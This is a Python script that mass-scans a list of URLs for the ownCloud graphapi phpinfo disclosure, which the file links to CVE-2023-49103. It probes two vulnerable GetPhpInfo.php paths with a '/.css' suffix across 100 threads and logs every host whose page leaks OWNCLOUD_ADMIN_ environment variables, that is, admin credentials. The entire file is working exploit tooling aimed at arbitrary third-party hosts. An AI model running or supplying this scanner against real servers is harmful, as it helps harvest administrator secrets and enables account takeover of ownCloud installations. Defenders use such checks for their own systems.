# Scanner for the ownCloud graphapi phpinfo disclosure (GetPhpInfo.php,
# presumably CVE-2023-49103 — confirm). Reads base URLs from a file and
# records hosts that leak OWNCLOUD_ADMIN_* environment variables.
import requests
import urllib3
from concurrent.futures import ThreadPoolExecutor
from colorama import Fore, Style
import argparse
import queue
from alive_progress import alive_bar
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def check_phpinfo(url):
    """Return True if *url* serves a phpinfo() page that leaks ownCloud
    admin environment variables (detected via the 'OWNCLOUD_ADMIN_' marker).

    Any network failure (connection error, timeout, bad response) is
    treated as a negative result, so callers never see an exception.
    """
    try:
        # verify=False: targets commonly run self-signed certificates.
        # timeout added so a single unresponsive host cannot hang a
        # worker thread indefinitely (the original call had no timeout).
        response = requests.get(url, verify=False, timeout=10)
        return response.status_code == 200 and 'OWNCLOUD_ADMIN_' in response.text
    except requests.RequestException:
        return False
def process_urls(url_queue, output_file, update_bar):
    """Worker loop: consume URLs from *url_queue* until a None sentinel.

    Hits are echoed in green and appended (one per line) to *output_file*;
    misses are echoed in red. *update_bar* is invoked exactly once for every
    real URL processed (not for the sentinel).
    """
    with open(output_file, 'a') as out:
        while True:
            candidate = url_queue.get()
            if candidate is None:
                # Sentinel received: account for it, then retire this worker.
                url_queue.task_done()
                break
            try:
                hit = check_phpinfo(candidate)
                if hit:
                    print(Fore.GREEN + "Valid: " + candidate + Style.RESET_ALL)
                    out.write(candidate + '\n')
                else:
                    print(Fore.RED + "Invalid: " + candidate + Style.RESET_ALL)
            except Exception as e:
                print(Fore.YELLOW + f"Error processing {candidate}: {e}" + Style.RESET_ALL)
            finally:
                # Always mark the item done and advance the bar, even on error.
                url_queue.task_done()
                update_bar()
def process_file(file_path, output_file):
    """Read base URLs from *file_path*, probe both known vulnerable paths
    for each, and append responsive URLs to *output_file*.

    Blank lines in the input are skipped (previously they produced bogus
    suffix-only URLs), and an empty input file is a no-op (previously it
    crashed with ThreadPoolExecutor(max_workers=0) -> ValueError).
    """
    urls = []
    with open(file_path, 'r') as file:
        for line in file:
            base_url = line.strip()
            if not base_url:
                continue  # skip blank lines
            # Append both URL variants for each base URL
            urls.append(base_url + "/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css")
            urls.append(base_url + "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css")
    if not urls:
        return  # nothing to do; avoids max_workers=0
    url_queue = queue.Queue()
    num_workers = min(100, len(urls))  # Adjust based on your system's capabilities
    with alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
        with ThreadPoolExecutor(max_workers=num_workers) as executor:
            # Start worker threads
            for _ in range(num_workers):
                executor.submit(process_urls, url_queue, output_file, bar)
            # Read URLs and add them to the queue
            for url in urls:
                url_queue.put(url)
            # Add sentinel values to indicate completion
            for _ in range(num_workers):
                url_queue.put(None)
            url_queue.join()  # Wait for all tasks to be completed
if __name__ == "__main__":
    # CLI entry point: -t is the input list of base URLs,
    # -o is where confirmed-vulnerable URLs are appended.
    arg_parser = argparse.ArgumentParser(description='Process some URLs.')
    arg_parser.add_argument('-t', '--target', required=True, help='Input file with URLs')
    arg_parser.add_argument('-o', '--output', required=True, help='Output file for valid URLs')
    cli_args = arg_parser.parse_args()
    process_file(cli_args.target, cli_args.output)